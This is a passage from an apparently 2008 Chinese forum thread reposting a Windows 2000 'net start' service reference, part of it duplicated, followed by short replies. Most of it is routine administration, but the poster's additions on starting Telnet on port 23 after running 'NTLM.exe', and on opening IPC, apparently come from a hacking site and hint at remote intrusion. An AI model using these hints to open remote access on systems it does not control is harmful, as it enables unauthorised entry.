hypermedia object manager、logical disk manager、lpdsvc、media services managemen
t, messenger、Fax Service、Microsoft install server、net logon、network dde、netw
ork dde dsdm、nt lm security support provider、ole、plug and play、remote access
connection manager、remote access isnsap service、remote access server、remote pr
ocedure call (rpc) locator、remote procedure call (rpc) service、schedule、server
、simple tcp/ip services、site server ldap service、smartcard resource manager、s
nmp、spooler、task scheduler、tcp/ip netbios helper、telephony service、tracking
service、tracking (server) service、ups、Windows time service 和 workstation。
下面服务只有在 Windows 2000 上可用:file service for macintosh、gateway service
for netware、microsoft dhcp service、print service for macintosh、windows interne
t name service。

Net start Alerter
启动“警报器”服务。“警报器”服务发送警告消息。
Net start Alerter
Net start Client Service for NetWare
启动“NetWare 客户服务”。该命令只有在安装了 NetWare 客户服务的情况下才能在 Wind
ows 2000 Professional 上使用。
net start "client service for netware"
Net start ClipBook Server
启动“剪贴簿服务器”服务。两个单词组成的服务名,例如 ClipBook Server,必须两边加
引号 (")。
net start "clipbook server"

Net start Computer Browser
启动“计算机浏览器”服务。
net start "computer browser"

Net start DHCP Client
启动“DHCP 客户”服务。该命令只有在安装了 TCP/IP 协议之后才可用。
net start "dhcp client"

Net start Directory Replicator
启动“目录复制程序”服务。“目录复制程序”服务将指定的文件复制到指定服务器上。两
个词组成的服务名,例如 Directory Replicator,必须两边加引号 (")。也可以用命令 net
start replicator 启动该服务。
net start "directory replicator"

Net start Eventlog
启动“事件日志”服务,该服务将事件记录在本地计算机上。必须在使用事件查看器查看记
录的事件之前启动该服务。
net start Eventlog

Net start File Server for Macintosh
启动 Macintosh 文件服务,允许 Macintosh 计算机使用共享文件。该命令只能在运行 Win
dows 2000 Server 的计算机上可用。
net start "file service for macintosh"
Net start FTP Publishing Service
启动 FTP 发布服务。该命令只有在安装了 Internet 信息服务后才可用。
net start "ftp publishing service"
Net start Gateway Service for NetWare
启动 NetWare 网关服务。该命令只有在安装了 NetWare 网关服务的情况下才能在 Windows
2000 Server 上可用。
net start "gateway service for netware"
Net start Lpdsvc
启动 TCP/IP 打印服务器服务。该命令只有在 UNIX 打印服务和 TCP/IP 协议安装后方可使
用。
net start lpdsvc

Net start Messenger
启动“信使”服务。“信使”服务允许计算机接收邮件。
net start messenger

Net start Microsoft DHCP Service
启动 Microsoft DHCP 服务。该命令只有在运行 Windows 2000 Server 并且已安装 TCP/IP
协议和 DHCP 服务的情况下才可用。
net start "microsoft dhcp service"

Net start Net Logon
启动“网络登录”服务。“网络登录”服务验证登录请求并控制复制用户帐户数据库域宽。
两个词组成的服务名,例如 Net Logon,必须两边加引号 (")。该服务也可以使用命令 net
start netlogon 启动。
net start "net logon"

Net start Network DDE
启动“网络 DDE”服务。
net start "network dde"
Net start NT LM Security Support Provider
启动“NT LM 安全支持提供程序”服务。该命令只有在安装了“NT LM 安全支持提供程序”
后才可用。
net start "nt lm security support provider"
Net start OLE
启动对象链接和嵌入服务。
net start ole
Net start Print Server for Macintosh
启动 Macintosh 打印服务器服务,允许从 Macintosh 计算机打印。该命令只能在运行 Win
dows 2000 Server 的计算机上可用。
net start "print server for macintosh"
Net start Remote Access Connection Manager
启动“远程访问连接管理器”服务。该命令只有在安装了“远程访问服务”后才可用。
net start "remote access connection manager"
Net start Remote Access ISNSAP Service
启动“远程访问 ISNSAP 服务”。该命令只有在安装了“远程访问服务”后才可用。
net start "remote access isnsap service"
Net start Remote Procedure Call (RPC) Locator
启动 RPC 定位器服务。“定位器”服务是 Microsoft Windows 2000 的 RPC 名称服务。
net start "remote procedure call (rpc) locator"

Net start Remote Procedure Call (RPC) Service
启动“远程过程调用 (RPC) 服务”。“远程过程调用 (RPC) 服务”是 Microsoft Windows
2000 的 RPC 子系统。RPC 子系统包括终结点映射器和其他各种 RPC 服务。
net start "remote procedure call (rpc) service"

Net start Schedule
启动“计划”服务。“计划”服务使计算机可以使用 at 命令在指定时间启动程序。
net start schedule

Net start Server
启动“服务器”服务。“服务器”服务使计算机可以共享网络上的资源。
net start server

Net start Simple TCP/IP Services
启动“简单 TCP/IP 服务”服务。该命令只有在安装了 TCP/IP 和“简单 TCP/IP 服务”后
才可以使用。
net start "simple tcp/ip services"
Net start Site Server LDAP Service
启动“Site Server LDAP 服务”。“Site Server LDAP 服务”在 Windows 2000 Active D
irectory 中发布 IP 多播会议。该命令只有在安装了“Site Server LDAP 服务”后才可以使
用。
net start "site server ldap service"

Net start SNMP
启动 SNMP 服务。SNMP 服务允许服务器向 TCP/IP 网络上的 SNMP 管理系统报告当前状态。
该命令只有在安装了 TCP/IP 和 SNMP 后才可以使用。
net start snmp

Net start Spooler
启动“后台打印程序”。
net start spooler
Net start TCP/IP NetBIOS Helper
在 TCP 服务上启用 Netbios 支持。该命令只有在安装了 TCP/IP 才可用。
net start "tcp/ip netbios helper"
Net start UPS
启动“不间断电源 (UPS)”服务
net start ups

Net start Windows Internet Name Service
启动“Windows Internet 命名服务”。该命令只有在安装了 TCP/IP 和“Windows Interne
t 命名服务”后在 Windows 2000 Servers 上才可以使用。
net start "windows internet name service"

Net start Workstation
启动“工作站”服务。“工作站”服务使计算机可以连接并使用网络资源。
net start workstation
Net start Schedule
有的地方称为“定时”服务,叫法不同,请大家注意了,其实是一回事!
Net start Telnet
启动telnet服务,打开23端口,有的情况下需先运行NTLM.exe。为什么?到榕G的说明里去找
吧!
net start workstation
打开NET USE
net start lanmanserver
打开 IPC 服务。
开FTP命令是:net start msftpsvc
Net start
启动服务,或显示已启动服务的列表。两个或多个词组成的服务名,例如 Net Logon 或 Co
mputer Browser,必须两边加引号 (")。
net start [service]
参数

键入不带参数的 net start 显示正在运行服务的列表。
service
包括 alerter、client service for netware、clipbook server、content index、comput
er browser、dhcp client、directory replicator、eventlog、ftp publishing service、
hypermedia object manager、logical disk manager、lpdsvc、media services managemen
t, messenger、Fax Service、Microsoft install server、net logon、network dde、netw
ork dde dsdm、nt lm security support provider、ole、plug and play、remote access
connection manager、remote access isnsap service、remote access server、remote pr
ocedure call (rpc) locator、remote procedure call (rpc) service、schedule、server
、simple tcp/ip services、site server ldap service、smartcard resource manager、s
nmp、spooler、task scheduler、tcp/ip netbios helper、telephony service、tracking
service、tracking (server) service、ups、Windows time service 和 workstation。
下面服务只有在 Windows 2000 上可用:file service for macintosh、gateway service
for netware、microsoft dhcp service、print service for macintosh、windows interne
t name service。

Net start Alerter
启动“警报器”服务。“警报器”服务发送警告消息。
Net start Alerter
Net start Client Service for NetWare
启动“NetWare 客户服务”。该命令只有在安装了 NetWare 客户服务的情况下才能在 Wind
ows 2000 Professional 上使用。
net start "client service for netware"
Net start ClipBook Server
启动“剪贴簿服务器”服务。两个单词组成的服务名,例如 ClipBook Server,必须两边加
引号 (")。
net start "clipbook server"

Net start Computer Browser
启动“计算机浏览器”服务。
net start "computer browser"
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 58 发表于: 2008-06-14 22:52:00
哎!不容易啊!终于转完了,幸好没有防灌水的机制 !!累个半死!版主给加点WW让我早日成为正式会员哦!
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 59 发表于: 2008-06-18 12:23:24
原来是黑基过来的·~呵呵,很全的~~